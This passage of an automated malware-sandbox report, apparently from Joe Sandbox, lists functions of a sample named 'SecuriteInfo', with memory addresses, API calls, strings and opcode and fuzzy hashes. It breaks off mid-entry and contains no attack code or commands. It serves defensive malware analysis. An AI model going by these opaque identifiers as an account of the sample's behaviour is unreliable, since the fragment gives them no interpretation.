                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 6c6516d00728e5aa285e52228f87e7376efb74907fe5d8f7b0396bd8f2cdcbcd
                                                                                                                                                                      • Instruction ID: a2a059872955a541d30262a9a4e411390291cca2b2aa8b4cca984b365802cce2
                                                                                                                                                                      • Opcode Fuzzy Hash: 6c6516d00728e5aa285e52228f87e7376efb74907fe5d8f7b0396bd8f2cdcbcd
                                                                                                                                                                      • Instruction Fuzzy Hash: A41136B1D002498FDB20DFAAC4457DEFBF4EB88324F20846AD459A7250CB75A944CFA5
                                                                                                                                                                      Function 0178B600 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0178B666
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 07a01fd9555e1d2e4434a1e8f52971f2498b48bb048822db92d410fe58d88adc
                                                                                                                                                                      • Instruction ID: 96c451211d4c185b3da8fa9274295dd029ae0c587ecfce695755027a72fdb92f
                                                                                                                                                                      • Opcode Fuzzy Hash: 07a01fd9555e1d2e4434a1e8f52971f2498b48bb048822db92d410fe58d88adc
                                                                                                                                                                      • Instruction Fuzzy Hash: A01110B5D002498FDB10DF9AC444ADEFBF4AB88324F10846AD558B7210C375A545CFA5
                                                                                                                                                                      Function 0F031A20 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0F031A85
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1735765744.000000000F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F030000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f030000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 5acff2df61632131bf3b3b10d65717a04f17dce5a99c0543c08ee3fb545a1fab
                                                                                                                                                                      • Instruction ID: f77eb8c2516b7cd7ad75a13c7d599d7ead256ec8a5656c93ba945a9bc98e1319
                                                                                                                                                                      • Opcode Fuzzy Hash: 5acff2df61632131bf3b3b10d65717a04f17dce5a99c0543c08ee3fb545a1fab
                                                                                                                                                                      • Instruction Fuzzy Hash: 7011E0B58003499FDB10DF9AD585BDEFFF8EB48320F24845AE558A7600C375AA84CFA1
                                                                                                                                                                      Function 0F031A28 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0F031A85
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1735765744.000000000F030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F030000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_f030000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: a435dc1b4f4fa214ecf20177738ca42730b7cc8faf3e4ea5c98a5f077d62e9b2
                                                                                                                                                                      • Instruction ID: 355449b61d9fd136c376e1650777e7bb4f6eb30ce49e84bd59ccf99acb2e31f3
                                                                                                                                                                      • Opcode Fuzzy Hash: a435dc1b4f4fa214ecf20177738ca42730b7cc8faf3e4ea5c98a5f077d62e9b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E11CEB5C003499FDB10DF9AC985BDEFBF8EB48324F20845AE558A7210C375A984CFA5
                                                                                                                                                                      Function 016ED3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724233462.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16ed000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 83c07b5642b97b9bf161a759ec09effa65100d572f786ec8f9aeca8e8f051c8c
                                                                                                                                                                      • Instruction ID: 6dabc834ba49602fd49539d226a6e327e9bb479291e6893f34a1be8214e64a08
                                                                                                                                                                      • Opcode Fuzzy Hash: 83c07b5642b97b9bf161a759ec09effa65100d572f786ec8f9aeca8e8f051c8c
                                                                                                                                                                      • Instruction Fuzzy Hash: 80212871502204DFDB05DF58DDC8B5ABFE5FBA4314F20C269E9094B356C336E456C6A1
                                                                                                                                                                      Function 016FD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724286208.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16fd000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 424d5d7563cb4f04b03ac6391ce881947f43c128ccb6586f25137bb562f21c66
                                                                                                                                                                      • Instruction ID: 00fb6b4dbd50bce35274c6bb1b30f19b9d0c461ff5663f20568876b3bdd2ac7e
                                                                                                                                                                      • Opcode Fuzzy Hash: 424d5d7563cb4f04b03ac6391ce881947f43c128ccb6586f25137bb562f21c66
                                                                                                                                                                      • Instruction Fuzzy Hash: F3210471604200DFDB15DF58D9C4B26BFA5FB84354F20C56DEA0A4B396C33AE447CA61
                                                                                                                                                                      Function 016FD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724286208.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16fd000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 584aff82684bf35ae5efb8ae43bbb47a1998597f79d38a9680ee311c6d38c8d0
                                                                                                                                                                      • Instruction ID: e2c6d3105454e3553ecfeac7e6edcb38acbd00664228b60655797ae016eabe49
                                                                                                                                                                      • Opcode Fuzzy Hash: 584aff82684bf35ae5efb8ae43bbb47a1998597f79d38a9680ee311c6d38c8d0
                                                                                                                                                                      • Instruction Fuzzy Hash: 62212679504200EFDB05DF98DDC4B26BBA5FB84324F20C66DEB094B356C336E446CAA1
                                                                                                                                                                      Function 016FD006 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724286208.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16fd000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: eca3a3e9f84fa3c2986bdf897ba638758dc585ad3863f925e112b75907941bb5
                                                                                                                                                                      • Instruction ID: ca98d4eda47c1f98702deff035aef6b3eb0e40917a6adc6abd64609ff75a140b
                                                                                                                                                                      • Opcode Fuzzy Hash: eca3a3e9f84fa3c2986bdf897ba638758dc585ad3863f925e112b75907941bb5
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A219D755093808FDB03CF24D994B15BF71EB46214F28C5EED9498F6A7C33A980ACB62
                                                                                                                                                                      Function 016ED3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724233462.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16ed000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                      • Instruction ID: a7a4b8d35c3fc962b761b1245a247506516b9ead899a9242e1f87014f68c76e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                      • Instruction Fuzzy Hash: 5411DF76405280DFDB02CF44D9C4B56BFB1FB94324F24C2A9D9090B256C33AE45ACBA1
                                                                                                                                                                      Function 016FD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724286208.00000000016FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016FD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16fd000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction ID: 339e074759dcace51c25a9b6fa80eab9ef2b51422eef73a184c566a565e27fa9
                                                                                                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11BB79504280DFDB02CF54C9C4B15BFA1FB84224F24C6AEDA494B396C33AE40ACBA1
                                                                                                                                                                      Function 016ED745 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724233462.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16ed000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 01f34e7c6e8f0a67653adbf051e8b41cde4b6b694929af1eefcb09569229b8a5
                                                                                                                                                                      • Instruction ID: f231b6eb4e4fb8110ea57a04114381d4ade46bac5689b7f4fb42d58538b0ad3c
                                                                                                                                                                      • Opcode Fuzzy Hash: 01f34e7c6e8f0a67653adbf051e8b41cde4b6b694929af1eefcb09569229b8a5
                                                                                                                                                                      • Instruction Fuzzy Hash: EA012B3104A3809AFB104F69CD88B77FFD8EF41324F18C62AED094A286C339D841C671
                                                                                                                                                                      Function 016ED744 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724233462.00000000016ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 016ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16ed000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c4bad47d8fc5799ebb517883067283100f6fff7e842f9b138fe6b8fe1d27704a
                                                                                                                                                                      • Instruction ID: 6f935087546782ec86f82c542f341c6fecc311472f08093348885c3168d97afb
                                                                                                                                                                      • Opcode Fuzzy Hash: c4bad47d8fc5799ebb517883067283100f6fff7e842f9b138fe6b8fe1d27704a
                                                                                                                                                                      • Instruction Fuzzy Hash: 71F062714053849AEB118F1ACD88B62FFE8EB45734F18C55AED484A286C3799844CBB1

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 05770228 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bbd20fc4a44f0d1a00aa73837d2378a3d18b9deacf8dc08509b71d6ec96de3af
                                                                                                                                                                      • Instruction ID: d11ee05b3df4e9c87003e55b434aaeff947fc033d72e8931706546f411faa8c6
                                                                                                                                                                      • Opcode Fuzzy Hash: bbd20fc4a44f0d1a00aa73837d2378a3d18b9deacf8dc08509b71d6ec96de3af
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F1283B04037458EE320EF65ED4C1893BF1BB46319BA05209DE652B2EDDBBC156ACF64
                                                                                                                                                                      Function 07B536C0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4b72329c841bae993f4c331c3ea48a40233186cc80a70d285661c3d2fe9bf477
                                                                                                                                                                      • Instruction ID: 177dc3ed386c73c71040dec4c19c945c2b845b4137151128813608f971c8ce57
                                                                                                                                                                      • Opcode Fuzzy Hash: 4b72329c841bae993f4c331c3ea48a40233186cc80a70d285661c3d2fe9bf477
                                                                                                                                                                      • Instruction Fuzzy Hash: 4FE1E9B4E001198FDB14CFA9D584AAEBBF2FF89304F2491A9D815AB355D731AD41CF60
                                                                                                                                                                      Function 07B5B3C0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a01fa6d9cdf47f981ed58bc582786be7eef12a007e29e7a3a01fc001bab5a478
                                                                                                                                                                      • Instruction ID: f796e5d8595495cc539719514ffd6c566975711822904805662ead6a8c0bcf5d
                                                                                                                                                                      • Opcode Fuzzy Hash: a01fa6d9cdf47f981ed58bc582786be7eef12a007e29e7a3a01fc001bab5a478
                                                                                                                                                                      • Instruction Fuzzy Hash: 67E1C7B4E002198FDB14DF99D984AAEBBB2FF89304F248169D814AB355D731AD42CF61
                                                                                                                                                                      Function 07B5AF88 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 18a3b368881d0b5c19d3e88491eb677c894b87ba914ffd407a7ac528fb65da2e
                                                                                                                                                                      • Instruction ID: f663ea676b2bdfabbee0bd4c6f52903c969635c7353a122bb77c84998918b3a0
                                                                                                                                                                      • Opcode Fuzzy Hash: 18a3b368881d0b5c19d3e88491eb677c894b87ba914ffd407a7ac528fb65da2e
                                                                                                                                                                      • Instruction Fuzzy Hash: D6E1D9B4E102198FDB14CF99D980AAEFBB2FF89304F24C169D914AB355D731A942CF60
                                                                                                                                                                      Function 07B5CD58 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dfc8e0252dce2c7c027fd0627aefb99f9d52a741834897a0cbf2cb88b46be86e
                                                                                                                                                                      • Instruction ID: 932454cfa908ebaeecccc6ce9eb44db330f485f7ff209397462dbc23b2c4eec1
                                                                                                                                                                      • Opcode Fuzzy Hash: dfc8e0252dce2c7c027fd0627aefb99f9d52a741834897a0cbf2cb88b46be86e
                                                                                                                                                                      • Instruction Fuzzy Hash: 56E1DAB4E002198BDB14CFA9D990AAEBBF2FB89304F24C169D914A7355D731AD42CF61
                                                                                                                                                                      Function 07B5AB50 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2b6c80c7ac7b74db8399a230d1c5215621f91f25d67f96a50212c684e68c5810
                                                                                                                                                                      • Instruction ID: 53bbc85462c8d955dc8b2b1462f4d662069e9a60ec6ccda33b5dd2e8538936e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b6c80c7ac7b74db8399a230d1c5215621f91f25d67f96a50212c684e68c5810
                                                                                                                                                                      • Instruction Fuzzy Hash: CBE1E9B4E002198FDB14DF99D980AAEBBB2FF89304F24C269D815A7355D730AD42CF60
                                                                                                                                                                      Function 07B5C920 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7b71596cef552458235b22368f0b6b574b7daf85554ade07ba45b477045c4236
                                                                                                                                                                      • Instruction ID: ee72ef6ae748668e8368e3fe448e93f154902cd0e0d5f1d2242f465da28d7785
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b71596cef552458235b22368f0b6b574b7daf85554ade07ba45b477045c4236
                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE1DAB4E0021A8FDB14CF99D980AAEBBB2FF89304F24C569D814A7355D731A942CF60
                                                                                                                                                                      Function 0178E1AC Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 889392da1f419cf53a2637c823f4d463e3ea9194fdcae6e93369d6130b610be4
                                                                                                                                                                      • Instruction ID: 997e5e2639a38f0e59cacdb593db8aca446a1567d4919acb61b0e1fc7066b92c
                                                                                                                                                                      • Opcode Fuzzy Hash: 889392da1f419cf53a2637c823f4d463e3ea9194fdcae6e93369d6130b610be4
                                                                                                                                                                      • Instruction Fuzzy Hash: EAA18F32E4061ACFCF05EFB4C88449EFBB2FF85310B15856AE905AB265DB71E955CB80
                                                                                                                                                                      Function 05770218 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0cf63a373dfaf618d7d321168f387bbe0de54c36ce95fd61166486aa1455bd37
                                                                                                                                                                      • Instruction ID: 05d245fab819494c487a58a93250396c7402ae28781261df164362e7a3486318
                                                                                                                                                                      • Opcode Fuzzy Hash: 0cf63a373dfaf618d7d321168f387bbe0de54c36ce95fd61166486aa1455bd37
                                                                                                                                                                      • Instruction Fuzzy Hash: 29C1F7B08037468ED720EF68EC481897BF1BB86315F655209DD616B2ECDBBC146ACF54
                                                                                                                                                                      Function 0577ED80 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 182a9e0ee35a522b4e14fda5769ee8755abd410e94efcf58496e29636fc05c5b
                                                                                                                                                                      • Instruction ID: 022487bb3e1e4ae96e4fa6dc1978c1cdc29b50f668e68328e76bb3d3adfde7bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 182a9e0ee35a522b4e14fda5769ee8755abd410e94efcf58496e29636fc05c5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 9D71E571610A098FEB34CF39D485A96B7F6FB49304B044E69E4A2CB650D774F845DB80
                                                                                                                                                                      Function 07B54390 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: ce16465a7c7e5172d36b52f52b1725eca6b7b986ef6779505b9982d98adde98b
                                                                                                                                                                      • Instruction ID: 3d32269a6ddd349f43722d1e97916f2de2197e04d42300838460c8aed050b7b7
                                                                                                                                                                      • Opcode Fuzzy Hash: ce16465a7c7e5172d36b52f52b1725eca6b7b986ef6779505b9982d98adde98b
                                                                                                                                                                      • Instruction Fuzzy Hash: 487174B4E016598FDB04DFAAD98469EFBF2BF88310F14D166E818AB315DB349942CF50
                                                                                                                                                                      Function 07B5438A Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 84e213c8867855860f61d18d616f4216fdf157c0042c55915cbaa6016c1674aa
                                                                                                                                                                      • Instruction ID: a862f0d29aefc992ef9f10957231404eae0f747254f0f175d7a81705361d673b
                                                                                                                                                                      • Opcode Fuzzy Hash: 84e213c8867855860f61d18d616f4216fdf157c0042c55915cbaa6016c1674aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 585163B5E006198FDB48DFAAD98469DFBF2BF88300F14C16AD819AB314DB349946CF40

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 02AC29EC Relevance: 5.4, Strings: 4, Instructions: 359COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                                                                      • API String ID: 0-2732225958
                                                                                                                                                                      • Opcode ID: c47f0829aedb93e8340c162bb3862ff04151491a2f37586e62fab1968c669407
                                                                                                                                                                      • Instruction ID: 2cee819d859a37013a130a1b197790424b5bde06e5c2d7a4add3f29e65008424
                                                                                                                                                                      • Opcode Fuzzy Hash: c47f0829aedb93e8340c162bb3862ff04151491a2f37586e62fab1968c669407
                                                                                                                                                                      • Instruction Fuzzy Hash: E6C127359082968FDB228B7899503EFBFF5AF8A204F2885DDC8865720BDF34955BC741
                                                                                                                                                                      Function 02AC3E09 Relevance: 2.9, Strings: 2, Instructions: 435COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_11_2_2ac0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Xbq$$^q
                                                                                                                                                                      • API String ID: 0-1593437937
                                                                                                                                                                      • Opcode ID: 30d68eb5056dd9cad251eecdb7f3f79c3a2ff58b6c911c46619f81056a13a6e6
                                                                                                                                                                      • Instruction ID: 5e214215833d794d3c0d5843ff12795441321aa31ad8ecd4ca76cffe1c16f3c0
                                                                                                                                                                      • Opcode Fuzzy Hash: 30d68eb5056dd9cad251eecdb7f3f79c3a2ff58b6c911c46619f81056a13a6e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 68F17C74E44219CFCB08DFB8D4546AEBBB2FF88310B24896DD846AB354CF359806CB85
                                                                                                                                                                      Function 02AC3CB1 Relevance: 2.6, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000B.00000002.1989657496.0000000002AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AC0000, based on PE: false
